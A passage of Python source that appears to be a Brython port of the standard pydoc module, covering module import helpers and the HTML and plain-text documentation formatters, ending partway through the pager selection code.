return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
with open(path, 'rb') as file:
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.seek(0)
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Remove the module from sys.modules and re-import to try
# and avoid problems with partially loaded modules.
# Also remove any submodules because they won't appear
# in the newly loaded module's namespace if they're already
# in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
#fix me brython
#elif exc is ImportError and value.name == path:
elif exc is ImportError and str(value) == str(path):
# No such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in path.split('.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
PYTHONDOCS = os.environ.get("PYTHONDOCS",
"http://docs.python.org/%d.%d/library"
% sys.version_info[:2])
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError(message)
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS", self.PYTHONDOCS)
basedir = os.path.join(sys.base_exec_prefix, "lib",
"python%d.%d" % sys.version_info[:2])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'_thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(text.expandtabs())
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, modpkginfo):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = modpkginfo
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def filelink(self, url, path):
"""Make a link to source file."""
return '<a href="file:%s">%s</a>' % (url, path)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return ''.join(results)
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + ', '.join(parents) + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = name.split('.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
('.'.join(parts[:i+1]), parts[i]))
linkedname = '.'.join(links + parts[-1:])
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = self.filelink(url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % ', '.join(info)
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Reference</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda t: self.modulelink(t[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = [value for (key, value) in classes]
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', ' '.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', ' '.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', '<br>\n'.join(contents))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
print('docclass')
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if callable(value) or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
attrs.sort(key=lambda t: t[0])
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % ', '.join(parents)
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % self.classlink(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.__func__
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, kwonlyargs, kwdefaults, varkw, defaults, ann = \
inspect.getfullargspec(object)
argspec = inspect.formatargspec(
args, varargs, kwonlyargs, kwdefaults, varkw, defaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
# XXX lambda's won't usually have func_annotations['return']
# since the syntax doesn't support but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
if any((0xD800 <= ord(ch) <= 0xDFFF) for ch in name):
# ignore a module if its name contains a surrogate character
continue
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
#def repr1(self, x, level):
# if hasattr(type(x), '__name__'):
# methodname = 'repr_' + '_'.join(type(x).__name__.split())
# if hasattr(self, methodname):
# return getattr(self, methodname)(x, level)
# return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return ''.join(ch + '\b' + ch for ch in text)
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = [prefix + line for line in text.split('\n')]
if lines: lines[-1] = lines[-1].rstrip()
return '\n'.join(lines)
def section(self, title, contents):
"""Format a section with a given heading."""
clean_contents = self.indent(contents).rstrip()
return self.bold(title) + '\n' + clean_contents + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = (classname(c, modname) for c in bases)
result = result + '(%s)' % ', '.join(parents)
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
all = getattr(object, '__all__', None)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE REFERENCE', docloc + """
The following documentation is automatically generated from the Python
source files. It may be incomplete, incorrect or include features that
are considered implementation detail and may vary between Python
implementations. When in doubt, consult the module reference at the
location listed above.
""")
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', '\n'.join(modpkgs))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', '\n'.join(submodules))
if classes:
classlist = [value for key, value in classes]
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', '\n'.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', '\n'.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', '\n'.join(contents))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % ', '.join(parents)
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if callable(value) or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(contents.rstrip(), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % classname(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.__func__
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann = \
inspect.getfullargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
# XXX lambda's won't usually have func_annotations['return']
# since the syntax doesn't support but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and self.indent(doc).rstrip() + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
class _PlainTextDoc(TextDoc):
"""Subclass of TextDoc which overrides string styling"""
def bold(self, text):
return text
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if not hasattr(sys.stdout, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
